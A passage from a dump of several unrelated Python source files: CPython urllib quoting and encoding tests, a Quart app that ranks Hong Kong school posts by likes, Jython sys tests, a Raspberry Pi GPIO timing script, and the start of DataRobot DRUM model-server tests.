# Characters in BMP, encoded by default in UTF-8
given = "\u6f22\u5b57" # "Kanji"
expect = "%E6%BC%A2%E5%AD%97"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, encoded with Latin-1
given = "\u6f22\u5b57"
self.assertRaises(UnicodeEncodeError, urllib.parse.quote, given,
encoding="latin-1")
# Characters in BMP, encoded with Latin-1, with replace error handling
given = "\u6f22\u5b57"
expect = "%3F%3F" # "??"
result = urllib.parse.quote(given, encoding="latin-1",
errors="replace")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, Latin-1, with xmlcharref error handling
given = "\u6f22\u5b57"
expect = "%26%2328450%3B%26%2323383%3B" # "漢字"
result = urllib.parse.quote(given, encoding="latin-1",
errors="xmlcharrefreplace")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
def test_quote_plus_with_unicode(self):
# Encoding (latin-1) test for quote_plus
given = "\xa2\xd8 \xff"
expect = "%A2%D8+%FF"
result = urllib.parse.quote_plus(given, encoding="latin-1")
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
# Errors test for quote_plus
given = "ab\u6f22\u5b57 cd"
expect = "ab%3F%3F+cd"
result = urllib.parse.quote_plus(given, encoding="latin-1",
errors="replace")
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
class UnquotingTests(unittest.TestCase):
"""Tests for unquote() and unquote_plus()
See the doc string for quoting_Tests for details on quoting and such.
"""
def test_unquoting(self):
# Make sure unquoting of all ASCII values works
escape_list = []
for num in range(128):
given = hexescape(chr(num))
expect = chr(num)
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" %
(expect, result))
escape_list.append(given)
escape_string = ''.join(escape_list)
del escape_list
result = urllib.parse.unquote(escape_string)
self.assertEqual(result.count('%'), 1,
"using unquote(): not all characters escaped: "
"%s" % result)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, None)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, ())
with warnings.catch_warnings():
warnings.simplefilter('ignore', BytesWarning)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, b'')
def test_unquoting_badpercent(self):
# Test unquoting on bad percent-escapes
given = '%xab'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%x'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
# unquote_to_bytes
given = '%xab'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
given = '%x'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
given = '%'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote_to_bytes, None)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote_to_bytes, ())
def test_unquoting_mixed_case(self):
# Test unquoting on mixed-case hex digits in the percent-escapes
given = '%Ab%eA'
expect = b'\xab\xea'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
def test_unquoting_parts(self):
# Make sure unquoting works when have non-quoted characters
# interspersed
given = 'ab%sd' % hexescape('c')
expect = "abcd"
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" % (expect, result))
def test_unquoting_plus(self):
# Test difference between unquote() and unquote_plus()
given = "are+there+spaces..."
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
expect = given.replace('+', ' ')
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" % (expect, result))
def test_unquote_to_bytes(self):
given = 'br%C3%BCckner_sapporo_20050930.doc'
expect = b'br\xc3\xbcckner_sapporo_20050930.doc'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test on a string with unescaped non-ASCII characters
# (Technically an invalid URI; expect those characters to be UTF-8
# encoded).
result = urllib.parse.unquote_to_bytes("\u6f22%C3%BC")
expect = b'\xe6\xbc\xa2\xc3\xbc' # UTF-8 for "\u6f22\u00fc"
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test with a bytes as input
given = b'%A2%D8ab%FF'
expect = b'\xa2\xd8ab\xff'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test with a bytes as input, with unescaped non-ASCII bytes
# (Technically an invalid URI; expect those bytes to be preserved)
given = b'%A2\xd8ab%FF'
expect = b'\xa2\xd8ab\xff'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
def test_unquote_with_unicode(self):
# Characters in the Latin-1 range, encoded with UTF-8
given = 'br%C3%BCckner_sapporo_20050930.doc'
expect = 'br\u00fcckner_sapporo_20050930.doc'
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in the Latin-1 range, encoded with None (default)
result = urllib.parse.unquote(given, encoding=None, errors=None)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in the Latin-1 range, encoded with Latin-1
result = urllib.parse.unquote('br%FCckner_sapporo_20050930.doc',
encoding="latin-1")
expect = 'br\u00fcckner_sapporo_20050930.doc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in BMP, encoded with UTF-8
given = "%E6%BC%A2%E5%AD%97"
expect = "\u6f22\u5b57" # "Kanji"
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence
given = "%F3%B1"
expect = "\ufffd" # Replacement character
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence, replace errors
result = urllib.parse.unquote(given, errors="replace")
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence, ignoring errors
given = "%F3%B1"
expect = ""
result = urllib.parse.unquote(given, errors="ignore")
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# A mix of non-ASCII and percent-encoded characters, UTF-8
result = urllib.parse.unquote("\u6f22%C3%BC")
expect = '\u6f22\u00fc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# A mix of non-ASCII and percent-encoded characters, Latin-1
# (Note, the string contains non-Latin-1-representable characters)
result = urllib.parse.unquote("\u6f22%FC", encoding="latin-1")
expect = '\u6f22\u00fc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
class urlencode_Tests(unittest.TestCase):
"""Tests for urlencode()"""
def help_inputtype(self, given, test_type):
"""Helper method for testing different input types.
'given' must lead to only the pairs:
* 1st, 1
* 2nd, 2
* 3rd, 3
Test cannot assume anything about order. Docs make no guarantee and
have possible dictionary input.
"""
expect_somewhere = ["1st=1", "2nd=2", "3rd=3"]
result = urllib.parse.urlencode(given)
for expected in expect_somewhere:
self.assertIn(expected, result,
"testing %s: %s not found in %s" %
(test_type, expected, result))
self.assertEqual(result.count('&'), 2,
"testing %s: expected 2 '&'s; got %s" %
(test_type, result.count('&')))
amp_location = result.index('&')
on_amp_left = result[amp_location - 1]
on_amp_right = result[amp_location + 1]
self.assertTrue(on_amp_left.isdigit() and on_amp_right.isdigit(),
"testing %s: '&' not located in proper place in %s" %
(test_type, result))
self.assertEqual(len(result), (5 * 3) + 2, #5 chars per thing and amps
"testing %s: "
"unexpected number of characters: %s != %s" %
(test_type, len(result), (5 * 3) + 2))
def test_using_mapping(self):
# Test passing in a mapping object as an argument.
self.help_inputtype({"1st":'1', "2nd":'2', "3rd":'3'},
"using dict as input type")
def test_using_sequence(self):
# Test passing in a sequence of two-item sequences as an argument.
self.help_inputtype([('1st', '1'), ('2nd', '2'), ('3rd', '3')],
"using sequence of two-item tuples as input")
def test_quoting(self):
# Make sure keys and values are quoted using quote_plus()
given = {"&":"="}
expect = "%s=%s" % (hexescape('&'), hexescape('='))
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
given = {"key name":"A bunch of pluses"}
expect = "key+name=A+bunch+of+pluses"
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
def test_doseq(self):
# Test that passing True for 'doseq' parameter works correctly
given = {'sequence':['1', '2', '3']}
expect = "sequence=%s" % urllib.parse.quote_plus(str(['1', '2', '3']))
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
result = urllib.parse.urlencode(given, True)
for value in given["sequence"]:
expect = "sequence=%s" % value
self.assertIn(expect, result)
self.assertEqual(result.count('&'), 2,
"Expected 2 '&'s, got %s" % result.count('&'))
def test_empty_sequence(self):
self.assertEqual("", urllib.parse.urlencode({}))
self.assertEqual("", urllib.parse.urlencode([]))
def test_nonstring_values(self):
self.assertEqual("a=1", urllib.parse.urlencode({"a": 1}))
self.assertEqual("a=None", urllib.parse.urlencode({"a": None}))
def test_nonstring_seq_values(self):
self.assertEqual("a=1&a=2", urllib.parse.urlencode({"a": [1, 2]}, True))
self.assertEqual("a=None&a=a",
urllib.parse.urlencode({"a": [None, "a"]}, True))
data = collections.OrderedDict([("a", 1), ("b", 1)])
self.assertEqual("a=a&a=b",
urllib.parse.urlencode({"a": data}, True))
def test_urlencode_encoding(self):
# ASCII encoding. Expect %3F with errors="replace'
given = (('\u00a0', '\u00c1'),)
expect = '%3F=%3F'
result = urllib.parse.urlencode(given, encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# Default is UTF-8 encoding.
given = (('\u00a0', '\u00c1'),)
expect = '%C2%A0=%C3%81'
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
# Latin-1 encoding.
given = (('\u00a0', '\u00c1'),)
expect = '%A0=%C1'
result = urllib.parse.urlencode(given, encoding="latin-1")
self.assertEqual(expect, result)
def test_urlencode_encoding_doseq(self):
# ASCII Encoding. Expect %3F with errors="replace'
given = (('\u00a0', '\u00c1'),)
expect = '%3F=%3F'
result = urllib.parse.urlencode(given, doseq=True,
encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# ASCII Encoding. On a sequence of values.
given = (("\u00a0", (1, "\u00c1")),)
expect = '%3F=1&%3F=%3F'
result = urllib.parse.urlencode(given, True,
encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# Utf-8
given = (("\u00a0", "\u00c1"),)
expect = '%C2%A0=%C3%81'
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
given = (("\u00a0", (42, "\u00c1")),)
expect = '%C2%A0=42&%C2%A0=%C3%81'
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
# latin-1
given = (("\u00a0", "\u00c1"),)
expect = '%A0=%C1'
result = urllib.parse.urlencode(given, True, encoding="latin-1")
self.assertEqual(expect, result)
given = (("\u00a0", (42, "\u00c1")),)
expect = '%A0=42&%A0=%C1'
result = urllib.parse.urlencode(given, True, encoding="latin-1")
self.assertEqual(expect, result)
def test_urlencode_bytes(self):
given = ((b'\xa0\x24', b'\xc1\x24'),)
expect = '%A0%24=%C1%24'
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
# Sequence of values
given = ((b'\xa0\x24', (42, b'\xc1\x24')),)
expect = '%A0%24=42&%A0%24=%C1%24'
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
def test_urlencode_encoding_safe_parameter(self):
# Send '$' (\x24) as safe character
# Default utf-8 encoding
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, safe=":$")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, doseq=True, safe=":$")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
# Safe parameter in sequence
given = ((b'\xa0\x24', (b'\xc1\x24', 0xd, 42)),)
expect = '%A0$=%C1$&%A0$=13&%A0$=42'
result = urllib.parse.urlencode(given, True, safe=":$")
self.assertEqual(expect, result)
# Test all above in latin-1 encoding
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, safe=":$",
encoding="latin-1")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
given = ((b'\xa0\x24', b'\xc1\x24'),)
expect = '%A0$=%C1$'
result = urllib.parse.urlencode(given, doseq=True, safe=":$",
encoding="latin-1")
given = ((b'\xa0\x24', (b'\xc1\x24', 0xd, 42)),)
expect = '%A0$=%C1$&%A0$=13&%A0$=42'
result = urllib.parse.urlencode(given, True, safe=":$",
encoding="latin-1")
self.assertEqual(expect, result)
class Pathname_Tests(unittest.TestCase):
"""Test pathname2url() and url2pathname()"""
def test_basic(self):
# Make sure simple tests pass
expected_path = os.path.join("parts", "of", "a", "path")
expected_url = "parts/of/a/path"
result = urllib.request.pathname2url(expected_path)
self.assertEqual(expected_url, result,
"pathname2url() failed; %s != %s" %
(result, expected_url))
result = urllib.request.url2pathname(expected_url)
self.assertEqual(expected_path, result,
"url2pathame() failed; %s != %s" %
(result, expected_path))
def test_quoting(self):
# Test automatic quoting and unquoting works for pathnam2url() and
# url2pathname() respectively
given = os.path.join("needs", "quot=ing", "here")
expect = "needs/%s/here" % urllib.parse.quote("quot=ing")
result = urllib.request.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
expect = given
result = urllib.request.url2pathname(result)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
given = os.path.join("make sure", "using_quote")
expect = "%s/using_quote" % urllib.parse.quote("make sure")
result = urllib.request.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
given = "make+sure/using_unquote"
expect = os.path.join("make+sure", "using_unquote")
result = urllib.request.url2pathname(given)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
@unittest.skipUnless(sys.platform == 'win32',
'test specific to the urllib.url2path function.')
def test_ntpath(self):
given = ('/C:/', '///C:/', '/C|//')
expect = 'C:\\'
for url in given:
result = urllib.request.url2pathname(url)
self.assertEqual(expect, result,
'urllib.request..url2pathname() failed; %s != %s' %
(expect, result))
given = '///C|/path'
expect = 'C:\\path'
result = urllib.request.url2pathname(given)
self.assertEqual(expect, result,
'urllib.request.url2pathname() failed; %s != %s' %
(expect, result))
class Utility_Tests(unittest.TestCase):
"""Testcase to test the various utility functions in the urllib."""
def test_splitpasswd(self):
"""Some of password examples are not sensible, but it is added to
confirming to RFC2617 and addressing issue4675.
"""
self.assertEqual(('user', 'ab'),urllib.parse.splitpasswd('user:ab'))
self.assertEqual(('user', 'a\nb'),urllib.parse.splitpasswd('user:a\nb'))
self.assertEqual(('user', 'a\tb'),urllib.parse.splitpasswd('user:a\tb'))
self.assertEqual(('user', 'a\rb'),urllib.parse.splitpasswd('user:a\rb'))
self.assertEqual(('user', 'a\fb'),urllib.parse.splitpasswd('user:a\fb'))
self.assertEqual(('user', 'a\vb'),urllib.parse.splitpasswd('user:a\vb'))
self.assertEqual(('user', 'a:b'),urllib.parse.splitpasswd('user:a:b'))
class URLopener_Tests(unittest.TestCase):
"""Testcase to test the open method of URLopener class."""
def test_quoted_open(self):
class DummyURLopener(urllib.request.URLopener):
def open_spam(self, url):
return url
self.assertEqual(DummyURLopener().open(
'spam://example/ /'),'//example/%20/')
# test the safe characters are not quoted by urlopen
self.assertEqual(DummyURLopener().open(
"spam://c:|windows%/:=&?~#+!$,;'@()*[]|/path/"),
"//c:|windows%/:=&?~#+!$,;'@()*[]|/path/")
# Just commented them out.
# Can't really tell why keep failing in windows and sparc.
# Everywhere else they work ok, but on those machines, sometimes
# fail in one of the tests, sometimes in other. I have a linux, and
# the tests go ok.
# If anybody has one of the problematic enviroments, please help!
# . Facundo
#
# def server(evt):
# import socket, time
# serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# serv.settimeout(3)
# serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# serv.bind(("", 9093))
# serv.listen(5)
# try:
# conn, addr = serv.accept()
# conn.send("1 Hola mundo\n")
# cantdata = 0
# while cantdata < 13:
# data = conn.recv(13-cantdata)
# cantdata += len(data)
# time.sleep(.3)
# conn.send("2 No more lines\n")
# conn.close()
# except socket.timeout:
# pass
# finally:
# serv.close()
# evt.set()
#
# class FTPWrapperTests(unittest.TestCase):
#
# def setUp(self):
# import ftplib, time, threading
# ftplib.FTP.port = 9093
# self.evt = threading.Event()
# threading.Thread(target=server, args=(self.evt,)).start()
# time.sleep(.1)
#
# def tearDown(self):
# self.evt.wait()
#
# def testBasic(self):
# # connects
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# ftp.close()
#
# def testTimeoutNone(self):
# # global default timeout is ignored
# import socket
# self.assertTrue(socket.getdefaulttimeout() is None)
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutDefault(self):
# # global default timeout is used
# import socket
# self.assertTrue(socket.getdefaulttimeout() is None)
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutValue(self):
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [],
# timeout=30)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
def test_main():
support.run_unittest(
urlopen_FileTests,
urlopen_HttpTests,
urlretrieve_FileTests,
ProxyTests,
QuotingTests,
UnquotingTests,
urlencode_Tests,
Pathname_Tests,
Utility_Tests,
URLopener_Tests,
#FTPWrapperTests,
)
if __name__ == '__main__':
test_main()
|
main.py
|
import asyncio
import json
import logging
import threading
from datetime import datetime
from typing import List, Tuple, Dict, Any
from aiocache import cached
from pytz import utc, timezone
from quart import Quart, render_template
from update_likes import likes_data, update_likes
logging.basicConfig(level="INFO", format="%(asctime)s - %(name)s - %(levelname)s - %(message)s")
logger = logging.getLogger(__name__)
try:
import coloredlogs
coloredlogs.install(level="INFO", fmt="%(asctime)s - %(name)s - %(levelname)s - %(message)s")
except ImportError:
logger.warn("coloredlogs unavailable")
app = Quart(__name__)
UNIVERSITIES = [
"香港大學",
"香港理工大學",
"香港浸會大學",
"香港中文大學",
"嶺南大學",
"香港城市大學",
"香港科技大學",
"香港教育大學",
"香港公開大學",
"香港樹仁大學",
"香港恒生大學"
]
hkt = timezone("Asia/Hong_Kong")
def get_likes() -> Tuple[List[Dict[str, Any]], List[Dict[str, Any]]]:
sslb = []
ulb = []
with open("posts.json", encoding="utf-8") as f:
posts = json.load(f)
for post in posts:
if post["school"] not in likes_data:
continue
lb = ulb if post["school"] in UNIVERSITIES else sslb
lb.append({**post, **likes_data[post["school"]]})
# Now each post object has keys "shortcode", "school", "likes" and "updated".
sslb.sort(key=lambda d: d["likes"], reverse=True)
ulb.sort(key=lambda d: d["likes"], reverse=True)
return sslb, ulb
@app.route("/")
@cached(ttl=1)
async def index() -> str:
sslb, ulb = get_likes()
return await render_template("index.html", sslb=sslb, ulb=ulb, enumerate=enumerate)
@app.template_filter("hkt")
async def show_hkt(iso_dt: str) -> str:
return datetime.fromisoformat(iso_dt).astimezone(hkt).strftime("%Y-%m-%d %H:%M:%S HKT")
async def update_likes_hourly() -> None:
while True:
thread = threading.Thread(target=update_likes, daemon=True)
thread.start()
await asyncio.sleep(3 * 60 * 60)
thread.join()
@app.before_serving
async def before_serving():
asyncio.create_task(update_likes_hourly())
|
test_sys_jy.py
|
import sys
import re
import unittest
import test.test_support
class SysTest(unittest.TestCase):
def test_platform(self):
self.assertEquals(sys.platform[:4], "java",
"sys.platform is not java")
def test_exit_arg(self):
"sys.exit can be called with args"
try:
sys.exit("leaving now")
except SystemExit, e:
self.assertEquals(str(e), "leaving now")
def test_tuple_args(self):
"Exceptions raised unpacking tuple args have right line number"
def tuple_args( (x,y) ): pass
try:
tuple_args( 10 )
except TypeError:
tb = sys.exc_info()[2]
if tb.tb_lineno == 0:
self.fail("Traceback lineno was zero")
def test_name(self):
"sys.__name__ can be reassigned/deleted"
self.assertEquals(sys.__name__, 'sys')
sys.__name__ = 'foo'
self.assert_('foo' in str(sys))
del sys.__name__
self.assert_('foo' not in str(sys))
sys.__name__ = 'sys'
def test_readonly(self):
def deleteClass(): del sys.__class__
self.assertRaises(TypeError, deleteClass)
def deleteDict(): del sys.__dict__
self.assertRaises(TypeError, deleteDict)
def assignClass(): sys.__class__ = object
self.assertRaises(TypeError, assignClass)
def assignDict(): sys.__dict__ = {}
self.assertRaises(TypeError, assignDict)
def test_resetmethod(self):
gde = sys.getdefaultencoding
sys.getdefaultencoding = 5
self.assertEquals(sys.getdefaultencoding, 5)
del sys.getdefaultencoding
self.assertRaises(AttributeError, getattr, sys, 'getdefaultencoding')
sys.getdefaultencoding = gde
def test_reload(self):
gde = sys.getdefaultencoding
del sys.getdefaultencoding
reload(sys)
self.assert_(type(sys.getdefaultencoding) == type(gde))
def exec_code_separately(function, sharing=False):
"""Runs code in a separate context: (thread, PySystemState, PythonInterpreter)
A PySystemState is used in conjunction with its thread
context. This is not so desirable - at the very least it means
that a thread pool cannot be shared. But this is not the place to
revisit ancient design decisions."""
def function_context():
from org.python.core import Py
from org.python.util import PythonInterpreter
from org.python.core import PySystemState
ps = PySystemState()
pi = PythonInterpreter({}, ps)
if not sharing:
ps.shadow()
ps.builtins = ps.builtins.copy()
pi.exec(function.func_code)
import threading
context = threading.Thread(target=function_context)
context.start()
context.join()
def set_globally():
import sys
import test.sys_jy_test_module # used as a probe
# can't use 'foo', test_with wants to have that undefined
sys.builtins['test_sys_jy_foo'] = 42
def set_shadow():
import sys
sys.builtins['fum'] = 24
class ShadowingTest(unittest.TestCase):
def setUp(self):
exec_code_separately(set_globally, sharing=True)
exec_code_separately(set_shadow)
def test_super_globals(self):
import sys, __builtin__
def get_sym(sym):
return sys.builtins.get(sym)
def get_sym_attr(sym):
return hasattr(__builtin__, sym)
self.assertEqual(test_sys_jy_foo, 42, "should be able to install a new builtin ('super global')")
self.assertEqual(get_sym('test_sys_jy_foo'), 42)
self.assertTrue(get_sym_attr('test_sys_jy_foo'))
def is_fum_there(): fum
self.assertRaises(NameError, is_fum_there) # shadowed global ('fum') should not be visible
self.assertEqual(get_sym('fum'), None)
self.assertTrue(not(get_sym_attr('fum')))
def test_sys_modules_per_instance(self):
import sys
self.assertTrue('sys_jy_test_module' not in sys.modules, "sys.modules should be per PySystemState instance")
def test_main():
test.test_support.run_unittest(SysTest, ShadowingTest)
if __name__ == "__main__":
test_main()
|
test4.py
|
import RPi.GPIO as GPIO
import time
import Queue
import threading
GPIO.setmode(GPIO.BCM)
speedpin=18
GPIO.setup(speedpin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
queue = Queue.Queue()
def printQueue():
while True:
s = queue.get()
print(s)
ta = threading.Thread(target=printQueue)
ta.start()
START = 0
WAIT_POS_EDGE = 1
WAIT_NEG_EDGE = 2
state = START
t0 = time.time()
while True:
time.sleep(0.0005)
i = GPIO.input(speedpin)
if state == START:
if i == 0:
state = WAIT_POS_EDGE
elif state == WAIT_POS_EDGE:
if i == 1:
t1 = time.time()
queue.put( "{t:f}".format(t=(t1-t0)))
t0 = t1
state = WAIT_NEG_EDGE
elif state == WAIT_NEG_EDGE:
if i == 0:
state = WAIT_POS_EDGE
|
test_custom_model.py
|
import collections
import glob
import json
import os
import pickle
import re
import shutil
import signal
import subprocess
import time
from tempfile import NamedTemporaryFile
from threading import Thread
from unittest import mock
from uuid import uuid4
import numpy as np
import pandas as pd
import pytest
import requests
from datarobot_drum.drum.args_parser import CMRunnerArgsRegistry
from datarobot_drum.drum.common import (
ArgumentsOptions,
CUSTOM_FILE_NAME,
CustomHooks,
PythonArtifacts,
RunMode,
)
from datarobot_drum.drum.runtime import DrumRuntime
TRAINING = "training"
INFERENCE = "inference"
# Framweork keywords
XGB = "xgboost"
KERAS = "keras"
KERAS_JOBLIB = "keras_joblib"
SKLEARN = "sklearn"
SIMPLE = "simple"
PYTORCH = "pytorch"
PYPMML = "pypmml"
RDS = "rds"
CODEGEN = "jar"
## adding h2o pojo and mojo
MOJO = "zip"
POJO = "java"
##
MULTI_ARTIFACT = "multiartifact"
CODEGEN_AND_SKLEARN = "codegen_and_sklearn"
# Problem keywords, used to mark datasets
REGRESSION = "regression"
REGRESSION_INFERENCE = "regression_inference"
BINARY = "binary"
# Language keywords
PYTHON = "python3"
NO_CUSTOM = "no_custom"
PYTHON_ALL_HOOKS = "python_all_hooks"
PYTHON_LOAD_MODEL = "python_load_model"
R = "R"
R_ALL_HOOKS = "R_all_hooks"
R_FIT = "R_fit"
JAVA = "java"
PYTHON_XGBOOST_CLASS_LABELS_VALIDATION = "predictions_and_class_labels_validation"
DOCKER_PYTHON_SKLEARN = "cmrunner_test_env_python_sklearn"
RESPONSE_PREDICTIONS_KEY = "predictions"
WEIGHTS_ARGS = "weights-args"
WEIGHTS_CSV = "weights-csv"
class DrumServerProcess:
def __init__(self):
self.process = None
self.out_stream = None
self.err_stream = None
@property
def returncode(self):
return self.process.returncode
class DrumServerRun:
def __init__(
self,
framework,
problem,
custom_model_dir,
docker=None,
with_error_server=False,
show_stacktrace=True,
):
port = 6799
server_address = "localhost:{}".format(port)
url_host = os.environ.get("TEST_URL_HOST", "localhost")
if docker:
self.url_server_address = "http://{}:{}".format(url_host, port)
else:
self.url_server_address = "http://localhost:{}".format(port)
cmd = "{} server --code-dir {} --address {}".format(
ArgumentsOptions.MAIN_COMMAND, custom_model_dir, server_address
)
cmd = TestCMRunner._cmd_add_class_labels(cmd, framework, problem)
if docker:
cmd += " --docker {}".format(docker)
if with_error_server:
cmd += " --with-error-server"
if show_stacktrace:
cmd += " --show-stacktrace"
self._cmd = cmd
self._process_object_holder = DrumServerProcess()
self._server_thread = None
def __enter__(self):
self._server_thread = Thread(
target=TestCMRunner.run_server_thread, args=(self._cmd, self._process_object_holder)
)
self._server_thread.start()
time.sleep(0.5)
TestCMRunner.wait_for_server(
self.url_server_address, timeout=10, process_holder=self._process_object_holder
)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
# shutdown server
response = requests.post(self.url_server_address + "/shutdown/")
assert response.ok
time.sleep(1)
self._server_thread.join()
@property
def process(self):
return self._process_object_holder or None
class TestCMRunner:
@classmethod
def setup_class(cls):
cls.tests_root_path = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
cls.tests_fixtures_path = os.path.join(cls.tests_root_path, "fixtures")
cls.tests_artifacts_path = os.path.join(cls.tests_fixtures_path, "drop_in_model_artifacts")
cls.tests_data_path = os.path.join(cls.tests_root_path, "testdata")
cls.training_templates_path = os.path.join(
cls.tests_root_path, "..", "model_templates", "training"
)
cls.paths_to_training_models = {
(PYTHON, SKLEARN): os.path.join(cls.training_templates_path, "python3_sklearn"),
(PYTHON, SIMPLE): os.path.join(cls.training_templates_path, "simple"),
(PYTHON, KERAS): os.path.join(cls.training_templates_path, "python3_keras_joblib"),
(PYTHON, XGB): os.path.join(cls.training_templates_path, "python3_xgboost"),
(R_FIT, RDS): os.path.join(cls.training_templates_path, "r_lang"),
(PYTHON, PYTORCH): os.path.join(cls.training_templates_path, "python3_pytorch"),
}
cls.fixtures = {
PYTHON: (os.path.join(cls.tests_fixtures_path, "custom.py"), "custom.py"),
NO_CUSTOM: (None, None),
PYTHON_ALL_HOOKS: (
os.path.join(cls.tests_fixtures_path, "all_hooks_custom.py"),
"custom.py",
),
PYTHON_XGBOOST_CLASS_LABELS_VALIDATION: (
os.path.join(cls.tests_fixtures_path, "pred_validation_custom.py"),
"custom.py",
),
PYTHON_LOAD_MODEL: (
os.path.join(cls.tests_fixtures_path, "load_model_custom.py"),
"custom.py",
),
R: (os.path.join(cls.tests_fixtures_path, "custom.R"), "custom.R"),
R_ALL_HOOKS: (os.path.join(cls.tests_fixtures_path, "all_hooks_custom.R"), "custom.R"),
R_FIT: (os.path.join(cls.tests_fixtures_path, "fit_custom.R"), "custom.R"),
}
cls.datasets = {
# If specific dataset should be defined for a framework, use (framework, problem) key.
# Otherwise default dataset is used (None, problem)
(None, REGRESSION): os.path.join(cls.tests_data_path, "boston_housing.csv"),
(PYPMML, REGRESSION): os.path.join(cls.tests_data_path, "iris_binary_training.csv"),
(None, REGRESSION_INFERENCE): os.path.join(
cls.tests_data_path, "boston_housing_inference.csv"
),
(None, BINARY): os.path.join(cls.tests_data_path, "iris_binary_training.csv"),
}
cls.artifacts = {
(None, REGRESSION): None,
